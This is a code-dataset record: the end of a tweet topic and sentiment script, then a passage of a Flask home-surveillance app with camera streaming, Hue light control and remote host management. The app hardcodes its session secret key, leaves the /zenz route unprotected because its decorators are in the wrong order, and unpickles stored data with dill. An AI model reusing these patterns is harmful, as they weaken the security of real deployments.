tfidf_vect.fit_transform(merger_tweets['tweettext'].values.astype('U'))\r\n\r\nnmf = NMF(n_components=5, random_state=42)\r\n\r\nnmf.fit(doc_term_matrix2)\r\n\r\nfirst_topic = nmf.components_[0]\r\n\r\ntop_topic_words = first_topic.argsort()[-10:]\r\n\r\n#Top 5 topics\r\nfor i in top_topic_words:\r\n\r\n print(tfidf_vect.get_feature_names()[i])\r\n\r\n\r\n\r\nfor i,topic in enumerate(nmf.components_):\r\n\r\n print(f'Top 10 words for topic #{i}:')\r\n\r\n print([tfidf_vect.get_feature_names()[i] for i in topic.argsort()[-10:]])\r\n\r\n print('\\n')\r\n\r\n \r\n\r\ntopic_values2 = nmf.transform(doc_term_matrix2)\r\n\r\nmerger_tweets['topic2'] = topic_values2.argmax(axis=1)\r\n\r\nmerger_tweets.head()\r\n\r\n\r\nfeatures = merger_tweets['tweettext']\r\n\r\nvectorizer = TfidfVectorizer (max_features=2500, min_df=7, max_df=0.8, stop_words=stop)\r\n\r\nprocessed_features = vectorizer.fit_transform(features).toarray()\r\n\r\nmerger_tweets.head()\r\n\r\nmerger_tweets['sentiment'] = get_tweet_sentiment(merger_tweets.tweettext)\r\n\r\nlabels = merger_tweets['topic']\r\n\r\n \r\n#Dividing the data into training and testing to find the accuracy percentage\r\nX_train, X_test, y_train, y_test = train_test_split(processed_features, labels, test_size=0.2, random_state=0)\r\n\r\n \r\n\r\ntext_classifier = RandomForestClassifier(n_estimators=200, 
random_state=0)\r\n\r\ntext_classifier.fit(X_train, y_train)\r\n\r\npredictions = text_classifier.predict(X_test)\r\n\r\nprint(confusion_matrix(y_test,predictions))\r\n\r\nprint(classification_report(y_test,predictions))\r\n\r\nprint(accuracy_score(y_test, predictions))","repo_name":"kalyankumar0249/Customer-Sentiment-analysis-on-Sprint-and-T-Mobile-merger","sub_path":"twitteranalysis.py","file_name":"twitteranalysis.py","file_ext":"py","file_size_in_byte":8592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71425867321","text":"#!/home/stephan/.virtualenvs/cvp0/bin/python\nimport sys\nsys.path.append(\"../../lib\")\n\nfrom flask import Flask, render_template, request, send_from_directory, jsonify, flash, url_for, redirect, Response, session, g\nfrom flask_session import Session\nfrom flask_sse import sse\nfrom threading import Thread\nfrom bson.objectid import ObjectId\nimport os\nimport models\nimport zmq\nimport cv2\nimport time\nimport requests\nimport configparser\nimport guckmongo\nimport zenzlib\nimport huelib\nimport threading\nimport flask_login\nfrom hasher import hash_password, check_password, read_hashfile, write_hashfile\nimport json\nimport numpy as np\nimport urllib.request\nfrom requests.auth import HTTPBasicAuth\nimport dill\nimport datetime\nimport ephem\n\nsocketstate = None\nCHATEDIT_INDEX = -1\n\n# try to get config & DB\ntry:\n dbconfig = configparser.ConfigParser()\n dbconfig.read(\"../../data/mongo_default/mongo_url.cfg\")\n dburl = dbconfig[\"CONFIG\"][\"DB_URL\"].rstrip()\n dbname = dbconfig[\"CONFIG\"][\"DB_NAME\"].rstrip()\n DB = guckmongo.ConfigDB(dburl, dbname)\nexcept Exception as e:\n print(str(e) + \": Cannot get WASTL config for DB, exiting ...\")\n sys.exit()\n\n# init Hue\nHUE = huelib.Hue()\n\n# init flask\napp = Flask(__name__)\napp.secret_key = \"dfdsmdsv11nmDFSDfds\"\napp.config['SESSION_TYPE'] = 'filesystem'\napp.config[\"REDIS_URL\"] = \"redis://ubuntuvm1.iv.at\"\napp.register_blueprint(sse, url_prefix='/stream')\nSession(app)\n\n\n# Login Manager\nlogin_manager = flask_login.LoginManager()\nlogin_manager.init_app(app)\n\n# Passwords\nhashfile = \"../../data/hash.pw\"\nusers = read_hashfile(hashfile)\n\n\ndef get_hue_onoff(h):\n g = h.get_all_groups()\n gs = h.get_groups_status(g)\n stat = True\n for gs0 in gs:\n if not gs0:\n stat = False\n break\n return stat\n\n\n# Camera: http url jpg\nclass Camera(object):\n def __init__(self, camnr, interval=0):\n self.interval = interval\n cursor = DB.db_getall(\"cameras\")\n cameralist = [cn[\"url\"] for cn in cursor]\n self.surl = cameralist[camnr]\n self.r = requests.get(self.surl, stream=True)\n self.lasttime = time.time()\n self.bytes = b''\n\n def restart(self):\n self.r = requests.get(self.surl, stream=True)\n\n def get_frame(self):\n try:\n for chunk in self.r.iter_content(chunk_size=1024):\n self.bytes += chunk\n a = self.bytes.find(b'\\xff\\xd8')\n b = self.bytes.find(b'\\xff\\xd9')\n if a != -1 and b != -1:\n jpg = self.bytes[a:b+2]\n self.bytes = self.bytes[b+2:]\n if time.time() - self.lasttime >= self.interval:\n frame = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)\n ret, jpeg = cv2.imencode('.jpg', frame)\n self.lasttime = time.time()\n return ret, jpeg.tobytes()\n else:\n return False, None\n except:\n return False, None\n\n\n# Camera stream with yield\ndef gen(camera):\n global frame0\n while True:\n try:\n ret, frame = camera.get_frame()\n time.sleep(0.01)\n if ret and frame is not None:\n yield 
(b'--frame\\r\\nContent-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n except:\n return\n\n\n# start WastlAlarmClient Thread\nclass PushThread(Thread):\n def __init__(self, app, DB0, HUE0, timeout=7200):\n Thread.__init__(self)\n self.daemon = True\n self.was = zenzlib.WastlAlarmClient()\n self.connector = zenzlib.Connector()\n self.app = app\n self.stop = True\n self.DB = DB0\n self.timeout = timeout\n self.guckstatus = False\n self.HUE = HUE0\n\n def run(self):\n o = ephem.Observer()\n o.lat = self.DB.db_query(\"ephem\", \"lat\")\n o.long = self.DB.db_query(\"ephem\", \"long\")\n sun = ephem.Sun()\n while True:\n # NEST\n # data = self.connector.send_to_connector(\"nest\", \"wastlinfo\", \"\", host=\"ubuntuvm1.iv,at\")\n # GUCK\n sent = False\n stat, data, paused = self.was.get_from_guck()\n try:\n # guck is running and data received\n if paused:\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=0, guckstatus=\"paused\", dackel=\"nobark\")\n type0 = \"paused\"\n sse.publish({\"message\": result0}, type=type0)\n elif stat:\n frame, tm = data\n cursor = self.DB.db.userdata.find()\n sent = True\n self.guckstatus = True\n # hue falls on_guck alert aktiviert\n if self.DB.db_query(\"hue\", \"schedule_type\") == \"5\":\n guckalarm = True\n if self.DB.db_query(\"hue\", \"onlynight\"):\n sun.compute()\n sunset0 = ephem.localtime(o.next_setting(sun))\n sunset = sunset0.hour + sunset0.minute/60\n sunrise0 = ephem.localtime(o.next_rising(sun))\n sunrise = sunrise0.hour + sunrise0.minute/60\n n0 = datetime.datetime.now()\n timedec = n0.hour + n0.minute/60\n if timedec > sunrise and timedec < sunset:\n guckalarm = False\n else:\n guckalarm = True\n if guckalarm:\n HUE.delete_all_schedules()\n gl = HUE.get_all_groups()\n HUE.set_groups_on(gl)\n try:\n gdur = self.DB.db_query(\"hue\", \"guckdur\")\n except:\n gdur = 15\n for g0 in gl:\n HUE.set_schedule_timer(g0, gdur, False)\n for userd in cursor:\n user0 = userd[\"user\"]\n active = userd[\"active\"]\n if active:\n # append photolist and increase no_newdetections\n newd = userd[\"no_newdetections\"] + 1\n self.DB.db_update2(\"userdata\", \"user\", user0, \"no_newdetections\", newd)\n photol = userd[\"photolist\"]\n # data0 = dill.dumps(frame), tm\n photol.append(tm)\n self.DB.db_update2(\"userdata\", \"user\", user0, \"photolist\", photol)\n DB.db_open_one(\"photodata\", {\"tm\": tm, \"frame\": dill.dumps(frame)})\n # only send to current active user: nralarms and guckstatus=\"on\"\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=newd, guckstatus=\"on\", dackel=\"bark\")\n type0 = \"nrdet_\" + user0\n sse.publish({\"message\": result0}, type=type0)\n type0 = \"title_\" + user0\n sse.publish({\"message\": str(newd)}, type=type0)\n # if more than x photos, delete oldest in photodata and userdata[photolist]\n if DB.db_count(\"photodata\") > 15:\n # delete oldest entry in photodata\n mintm = DB.db_find_min(\"photodata\", \"tm\")\n DB.db_delete_one(\"photodata\", \"tm\", mintm)\n # delete also from all active users photolist\n for userd2 in cursor:\n user2 = userd2[\"user\"]\n photol = userd2[\"photolist\"]\n photol.remove(mintm)\n self.DB.db_update2(\"userdata\", \"user\", user2, \"photolist\", photol)\n if not paused:\n # guck not running -> send sse \"guckstatus: off\" (red) to all users\n if stat is False and data is not False:\n self.guckstatus = False\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=0, guckstatus=\"off\", 
dackel=\"nobark\")\n type0 = \"guck\"\n # print(type0)\n sse.publish({\"message\": result0}, type=type0)\n # guck running but no data received and no data sent -> send sse \"on\" ()\n else:\n if not sent:\n cursor = self.DB.db.userdata.find()\n self.guckstatus = True\n for userd in cursor:\n user0 = userd[\"user\"]\n active = userd[\"active\"]\n newd = userd[\"no_newdetections\"]\n if active:\n with self.app.app_context():\n result0 = render_template(\"guckphoto.html\", nralarms=newd, guckstatus=\"on\",\n dackel=\"nobark\")\n type0 = \"idle_\" + user0\n sse.publish({\"message\": result0}, type=type0)\n type0 = \"title_\" + user0\n sse.publish({\"message\": str(newd)}, type=type0)\n # if guck is running check for inactive users and set to inactive in case of\n if self.guckstatus:\n cursor = self.DB.db.userdata.find()\n for userd in cursor:\n lasttm = userd[\"lasttm\"]\n if time.time() - lasttm > self.timeout:\n user0 = userd[\"user\"]\n DB.db_update2(\"userdata\", \"user\", user0, \"active\", False)\n except Exception as e:\n print(\"Error @ \" + str(time.time()) + \": \" + str(e))\n time.sleep(1)\n\n\nPUSHT = PushThread(app, DB, HUE)\nPUSHT.start()\ncursor = DB.db.userdata.find()\nfor userd in cursor:\n DB.db_delete_one(\"userdata\", \"user\", userd[\"user\"])\ncursor = DB.db.photodata.find()\nfor photod in cursor:\n DB.db_delete_one(\"photodata\", \"tm\", photod[\"tm\"])\n\n\n@app.before_request\ndef beforerequest():\n try:\n user0 = flask_login.current_user.get_id()\n g.user = user0\n if user0 is not None:\n if not DB.db_find_one(\"userdata\", \"user\", user0):\n DB.db_open_one(\"userdata\", {\"user\": user0, \"lasttm\": time.time(), \"active\": True, \"no_newdetections\": 0,\n \"photolist\": []})\n else:\n DB.db_update2(\"userdata\", \"user\", user0, \"lasttm\", time.time())\n DB.db_update2(\"userdata\", \"user\", user0, \"active\", True)\n except Exception as e:\n print(str(e))\n pass\n\n\n# Login Manager\nclass User(flask_login.UserMixin):\n pass\n\n\n@login_manager.user_loader\ndef user_loader(email):\n if email not in users:\n return\n user = User()\n user.id = email\n return user\n\n\n@login_manager.request_loader\ndef request_loader(request):\n email = request.form.get('email')\n if email not in users:\n return\n user = User()\n user.id = email\n user.is_authenticated = check_password(users[email]['pw'], request.form[\"pw\"])\n return user\n\n\n# helper functions\ndef save_and_prepare_forms(db0, form0, formlist):\n for f in formlist:\n if f == form0:\n f.updatedb(DB)\n f.populateform(DB)\n\n\ndef flash_errors(form):\n for field, errors in form.errors.items():\n for error in errors:\n flash(u\"Error in the %s field - %s\" % (\n getattr(form, field).label.text,\n error\n ))\n\n\n# Routes\n@app.route(\"/wastl.png\")\ndef favicon():\n return send_from_directory(os.path.join(app.root_path, 'static'), 'wastl.ico', mimetype='image/vnd.microsoft.icon')\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\n@app.route(\"/home\", methods=['GET', 'POST'])\ndef index():\n return render_template(\"index.html\", userauth=flask_login.current_user.is_authenticated)\n\n\n@app.route('/video_feed//', defaults={\"interval\": 5})\n@app.route('/video_feed///')\ndef video_feed(camnr, interval=5):\n global gen0\n try:\n gen0.close()\n except:\n pass\n gen0 = gen(Camera(int(camnr)-1, int(interval)))\n ret = Response(gen0, mimetype='multipart/x-mixed-replace; boundary=frame')\n return ret\n\n\n# hier noch fullscreen!\n@app.route(\"/livecam/\", defaults={\"camnrstr\": 0, \"interval\": 2, \"toggle\": 0, \"ptz\": 
0}, methods=['GET', 'POST'])\n@app.route(\"/livecam//\", defaults={\"interval\": 2, \"toggle\": 0, \"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam///\", defaults={\"toggle\": 0, \"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam////\", defaults={\"ptz\": 0}, methods=['GET', 'POST'])\n@app.route(\"/livecam////\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef livecam(camnrstr=0, interval=2, toggle=0, ptz=0):\n if request.method == \"GET\":\n ptz0 = int(ptz)\n camnr = int(camnrstr)\n cursor = DB.db_getall(\"cameras\")\n cameralist = [(cn[\"_id\"], cn[\"name\"], cn[\"photo_url\"], cn[\"url\"]) for cn in cursor]\n if ptz0 != 0 and len(cameralist)-1 >= camnr:\n cursor = DB.db_getall(\"cameras\")\n ptzlist = [(cn[\"_id\"], cn[\"ptz_up\"], cn[\"ptz_down\"], cn[\"ptz_left\"], cn[\"ptz_right\"]) for cn in cursor]\n _, ptz_up, ptz_down, ptz_left, ptz_right = ptzlist[camnr]\n ptzcommand = \"\"\n if ptz0 == 1:\n ptzcommand = ptz_up\n elif ptz0 == 2:\n ptzcommand = ptz_down\n elif ptz0 == 3:\n ptzcommand = ptz_left\n elif ptz0 == 4:\n ptzcommand = ptz_right\n if ptzcommand != \"\":\n try:\n requests.get(ptzcommand)\n except:\n pass\n return render_template(\"livecam.html\", cameralist=cameralist, camnr=camnr+1, speed=int(interval),\n toggle=int(toggle), ptz=0)\n elif request.method == \"POST\":\n pass\n\n\n@flask_login.login_required\n@app.route(\"/zenz\", methods=['GET', 'POST'])\ndef zenz():\n return render_template(\"zenz.html\")\n\n\n@app.route(\"/userlogin\", methods=['GET', 'POST'])\ndef userlogin():\n if request.method == \"GET\":\n userloginform = models.UserLoginForm(request.form)\n return render_template(\"login.html\", userloginform=userloginform, userauth=flask_login.current_user.is_authenticated)\n else:\n users = read_hashfile(hashfile)\n userloginform = models.UserLoginForm(request.form)\n email = userloginform.email.data\n pw = userloginform.password.data\n try:\n pw_hash = users[email][\"pw\"]\n except:\n return redirect(url_for(\"index\"))\n if check_password(pw_hash, pw):\n user = User()\n user.id = email\n flask_login.login_user(user)\n return render_template(\"index.html\")\n return redirect(url_for('index'))\n\n\n@login_manager.unauthorized_handler\ndef unauthorized_handler():\n return redirect(url_for('index'))\n\n\n@app.route(\"/userlogout\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef userlogout():\n global USER\n flask_login.logout_user()\n USER = None\n return render_template(\"index.html\", userauth=flask_login.current_user.is_authenticated)\n\n\n@app.route(\"/detections\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef detections():\n global DB\n # delete all files in directory\n filelist = [f for f in os.listdir(\"./static/\") if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(\"./static/\" + f)\n detlist = []\n cursor = DB.db.userdata.find()\n for userd in cursor:\n user0 = userd[\"user\"]\n if user0 == g.user:\n photol = userd[\"photolist\"]\n thresh = 15\n for i, tm in enumerate(reversed(photol)):\n if i > thresh:\n break\n try:\n framedill = DB.db_find_one(\"photodata\", \"tm\", tm)[\"frame\"]\n frame = dill.loads(framedill)\n photoname = \"detphoto\" + tm + \".jpg\"\n detlist.append((photoname, tm))\n fn = \"./static/\" + photoname\n cv2.imwrite(fn, frame)\n except Exception:\n thresh += 1\n DB.db_update2(\"userdata\", \"user\", user0, \"no_newdetections\", 0)\n return render_template(\"detections.html\", detlist=detlist)\n\n\n@app.route(\"/guck//\", defaults={\"param1\": \"0\"}, methods=['GET', 
'POST'])\n@app.route(\"/guck//\", methods=['GET', 'POST'])\n@flask_login.login_required\ndef guck(menu1, param1):\n global socket\n global socketstate\n global DB\n\n if menu1 == \"photo\" or menu1 == \"system\" or menu1 == \"help\" or menu1 == \"status\" or menu1 == \"start\" or menu1 == \"stop\" or menu1 == \"runtime-settings\":\n GUCK_PATH = DB.db_query(\"remote\", \"guck_path\")\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_HOST_SHORT = DB.db_query(\"remote\", \"remote_host_short\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n REMOTE_SSH_PORT = DB.db_query(\"remote\", \"remote_ssh_port\")\n REMOTE_HOST_MAC = DB.db_query(\"remote\", \"remote_host_mac\")\n INTERFACE = DB.db_query(\"remote\", \"interface\")\n REMOTE_VIRTUALENV = DB.db_query(\"remote\", \"remote_virtualenv\")\n ZENZL = zenzlib.ZenzLib(REMOTE_HOST, REMOTE_HOST_MAC, INTERFACE, REMOTE_PORT, REMOTE_HOST_SHORT, REMOTE_SSH_PORT,\n GUCK_PATH, REMOTE_VIRTUALENV)\n\n if menu1 == \"photo\":\n camlist = []\n pn = []\n # delete all files in directory\n filelist = [f for f in os.listdir(\"./static/\") if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(\"./static/\" + f)\n # just one photo or all?\n cursor = DB.db_getall(\"cameras\")\n nr_cameras = len([(cn[\"_id\"], cn[\"name\"], cn[\"enable\"]) for cn in cursor])\n # print(\"# cameras:\", nr_cameras)\n if int(param1) < nr_cameras:\n lowerbound = upperbound = int(param1)\n else:\n lowerbound = 0\n upperbound = nr_cameras - 1\n # loop over all cameras and save photos as .jpg\n j = 1\n REMOTE_HOST = DB.db_query(\"remote\", \"remote_host\")\n REMOTE_PORT = DB.db_query(\"remote\", \"remote_port\")\n camsok = True\n for photoindex in range(lowerbound, upperbound + 1):\n sstr = \"photo \" + str(photoindex)\n ok, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n if ok:\n rep0, repname, repfr = res0\n # save new .jpg\n tm = time.strftime(\"%a%d%b%Y%H:%M:%S\")\n photoname = \"jpgphoto\" + str(j) + tm + \".jpg\"\n pn.append(photoname)\n fn = \"./static/\" + photoname\n cv2.imwrite(fn, repfr)\n j += 1\n else:\n pn.append(False)\n camsok = False\n i = 0\n cursor = DB.db.cameras.find()\n for cam in cursor:\n camlist.append((str(i), cam[\"name\"], camsok))\n i += 1\n camlist.append((str(i), \"ALL CAMERAS\", camsok))\n return render_template(\"photo.html\", camlist=camlist, pn=pn, param1=param1, menu1=menu1)\n elif menu1 == \"runtime-settings\":\n stat, res0 = ZENZL.request_to_guck(\"gettgmode\", REMOTE_HOST, REMOTE_PORT)\n rtm = \"verbose\" in res0\n return render_template(\"runtime.html\", param1=param1, rtm=rtm)\n elif menu1 == \"start\":\n rep0 = []\n stat, rep = ZENZL.ping()\n if stat == 0:\n ZENZL.lanwake()\n rep0.append(rep)\n rep0.append(\"Guck host down, now booting up via WOL, pls try again in 1 min ...\")\n elif stat == 1:\n noservers = ZENZL.get_nr_instances()\n if noservers > 0:\n ZENZL.killguck()\n rep0.append(rep)\n rep0.append(\"Killing guck on \" + REMOTE_HOST_SHORT)\n try:\n ZENZL.startguck()\n rep0.append(\"Starting guck at \" + REMOTE_HOST_SHORT)\n except Exception as e:\n rep0.append(str(e))\n # rep0 += \"\\nError in guck start up, possibly no ssh access to guck host ... 
?\"\n else:\n rep0.append(\"Error in ping to guck host: \" + rep)\n return render_template(\"start.html\", rep0=rep0)\n elif menu1 == \"system\":\n # ping\n rep0 = []\n if param1 == \"1\":\n stat, rep = ZENZL.ping()\n if stat == -1:\n rep0.append(\"Error in ping to guck host: \" + str(rep))\n else:\n rep0.append(rep)\n # (re)start\n elif param1 == \"2\":\n stat, rep = ZENZL.ping()\n if stat == 0:\n ZENZL.lanwake()\n rep0.append(rep)\n rep0.append(\"Guck host down, now booting up via WOL, pls try again in 1 min ...\")\n elif stat == 1:\n noservers = ZENZL.get_nr_instances()\n if noservers > 0:\n ZENZL.killguck()\n rep0.append(rep)\n rep0.append(\"Killing guck on \" + REMOTE_HOST_SHORT)\n try:\n ZENZL.startguck()\n rep0.append(\"Starting guck at: \" + REMOTE_HOST_SHORT)\n except Exception as e:\n rep0.append(str(e))\n # rep0 += \"\\nError in guck start up, possibly no ssh access to guck host ... ?\"\n else:\n rep0.append(\"Error in ping to guck host: \" + rep)\n # stop/shutdown\n elif param1 == \"3\" or param1 == \"10\" or param1 == \"11\":\n ZENZL.killguck()\n if param1 == \"3\":\n rep0.append(\"Killing guck on \" + REMOTE_HOST_SHORT)\n if param1 == \"10\":\n ZENZL.shutdown()\n rep0.append(\"Killing guck, shutting down \" + REMOTE_HOST_SHORT)\n if param1 == \"11\":\n ZENZL.reboot()\n rep0.append(\"Killing guck and rebooting \" + REMOTE_HOST_SHORT)\n elif param1 in [\"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n res00 = \"\"\n if param1 == \"4\":\n sstr = \"pause\"\n elif param1 == \"5\":\n sstr = \"resume\"\n elif param1 == \"6\":\n sstr = \"quit\"\n elif param1 == \"7\":\n sstr = \"record start\"\n elif param1 == \"8\":\n sstr = \"record stop\"\n elif param1 == \"9\":\n sstr = \"clear\"\n cursor_user = DB.db.userdata.find()\n cursor_photo = DB.db.photodata.find()\n # delete photolist in userdata in DB\n for cu in cursor_user:\n user2 = cu[\"user\"]\n DB.db_update2(\"userdata\", \"user\", user2, \"photolist\", [])\n # delete all photodata in DB\n for cp in cursor_photo:\n id = cp[\"_id\"]\n DB.db_delete_one(\"photodata\", \"_id\", id)\n # delete all photos in Folder\n filelist = [f for f in os.listdir(\"./static/\") if f.endswith(\".jpg\")]\n for f in filelist:\n os.remove(\"./static/\" + f)\n res00 = \"and removing detection photos!\"\n stat, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n if stat:\n rep, repname, repfr = res0\n rep0.append(rep + res00)\n else:\n rep0.append(res0 + res00)\n elif param1 == \"0\":\n rep0 = []\n param1 = \"1\"\n return render_template(\"system.html\", rep0=rep0, param1=param1, menu1=menu1)\n elif menu1 == \"stop\":\n ZENZL.killguck()\n rep0 = [\"Killing guck on \" + REMOTE_HOST_SHORT]\n return render_template(\"start.html\", rep0=rep0)\n elif menu1 == \"status\":\n sstr = \"status\"\n stat, res0 = ZENZL.request_to_guck(sstr, REMOTE_HOST, REMOTE_PORT)\n if stat:\n rep0, repname, repfr = res0\n else:\n rep0 = res0\n replist = rep0.split(\"\\n\")\n return render_template(\"status.html\", replist=replist, menu1=menu1)\n elif menu1 == \"config\":\n camlist = []\n tabchoice = \"basic\"\n if request.method == \"GET\":\n basicform = models.BasicForm(request.form)\n telegramform = models.TelegramForm(request.form)\n mailform = models.MailForm(request.form)\n ftpform = models.FTPForm(request.form)\n smsform = models.SMSForm(request.form)\n aiform = models.AIForm(request.form)\n photoform = models.PhotoForm(request.form)\n camerasform = models.CamerasForm(request.form)\n remoteform = models.RemoteForm(request.form)\n formlist = [telegramform, basicform, 
mailform, ftpform, smsform, aiform, photoform, camerasform, remoteform]\n for f in formlist:\n f.populateform(DB)\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n if request.method == 'POST':\n basicform = models.BasicForm(request.form)\n telegramform = models.TelegramForm(request.form)\n mailform = models.MailForm(request.form)\n ftpform = models.FTPForm(request.form)\n smsform = models.SMSForm(request.form)\n aiform = models.AIForm(request.form)\n photoform = models.PhotoForm(request.form)\n remoteform = models.RemoteForm(request.form)\n camerasform = models.CamerasForm(request.form)\n formlist = [telegramform, basicform, mailform, ftpform, smsform, aiform, photoform, camerasform, remoteform]\n # basic\n if (basicform.save.data):\n if basicform.validate_on_submit() or not basicform.doheartbeat.data:\n save_and_prepare_forms(DB, basicform, formlist)\n else:\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"basic\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # cameras\n elif (camerasform.camedit_t.data):\n if camerasform.validate_on_submit():\n # print(\"validate\")\n camerasform.copyajaxdata(DB)\n save_and_prepare_forms(DB, camerasform, formlist)\n else:\n flash_errors(camerasform)\n # print(\">>>\", camerasform.act_camera_id.data)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"cameras\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n elif camerasform.camadd_t.data:\n if camerasform.validate_on_submit():\n id0 = DB.db_open_one(\"cameras\", {\"name\": \"dummy0\", \"enable\": True})\n camerasform.updatedb(DB, idparam=id0)\n camerasform.copyajaxdata(DB)\n save_and_prepare_forms(DB, camerasform, formlist)\n else:\n print(\"Not validated!\")\n flash_errors(camerasform)\n camerasform.copyajaxdata(DB)\n tabchoice = \"cameras\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n elif camerasform.camcancel_t.data:\n camerasform.act_camera_id.data = \"-1\"\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"cameras\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n\n # telegram\n elif (telegramform.save_t.data):\n if telegramform.validate_on_submit() or not telegramform.dotelegram.data:\n telegramform.copyajaxdata(DB)\n save_and_prepare_forms(DB, telegramform, formlist)\n else:\n flash_errors(telegramform)\n telegramform.copyajaxdata(DB)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"telegram\"\n return render_template('config.html', basicform=basicform, 
telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n elif telegramform.chatadd_t.data or telegramform.chatedit_t.data:\n cdata = telegramform.chatid_id.data\n chat_index = int(telegramform.chatedit_index.data)\n if cdata and telegramform.chatadd_t.data:\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n chatidlist.append(telegramform.chatid_id.data)\n DB.db_update(\"telegram\", \"chatidlist\", chatidlist)\n elif cdata and telegramform.chatedit_t.data and chat_index > -1:\n chatidlist = DB.db_query(\"telegram\", \"chatidlist\")\n chatidlist[chat_index] = telegramform.chatid_id.data\n DB.db_update(\"telegram\", \"chatidlist\", chatidlist)\n telegramform.chatedit_index.data = \"-1\"\n tabchoice = \"telegram\"\n telegramform.copyajaxdata(DB)\n save_and_prepare_forms(DB, None, formlist)\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # mail\n elif (mailform.save_m.data):\n if mailform.validate_on_submit() or not mailform.domail.data:\n save_and_prepare_forms(DB, mailform, formlist)\n else:\n flash_errors(mailform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"mail\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # ftp\n elif (ftpform.save_f.data):\n if ftpform.validate_on_submit() or not ftpform.doftp.data:\n save_and_prepare_forms(DB, ftpform, formlist)\n else:\n flash_errors(ftpform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"ftp\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # sms\n elif (smsform.save_s.data):\n if smsform.validate_on_submit() or not smsform.dosms.data:\n save_and_prepare_forms(DB, smsform, formlist)\n else:\n flash_errors(smsform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"sms\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # photo\n elif (photoform.save_p.data):\n if photoform.validate_on_submit():\n save_and_prepare_forms(DB, photoform, formlist)\n else:\n flash_errors(photoform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"photo\"\n return render_template('config.html', basicform=basicform, telegramform=telegramform, mailform=mailform,\n ftpform=ftpform, smsform=smsform, aiform=aiform, photoform=photoform,\n camerasform=camerasform, tabchoice=tabchoice, remoteform=remoteform, chatedit=\"empty\")\n # remote\n elif (remoteform.save_r.data):\n if remoteform.validate_on_submit():\n save_and_prepare_forms(DB, remoteform, formlist)\n else:\n flash_errors(remoteform)\n save_and_prepare_forms(DB, None, formlist)\n tabchoice = \"remote\"\n return 
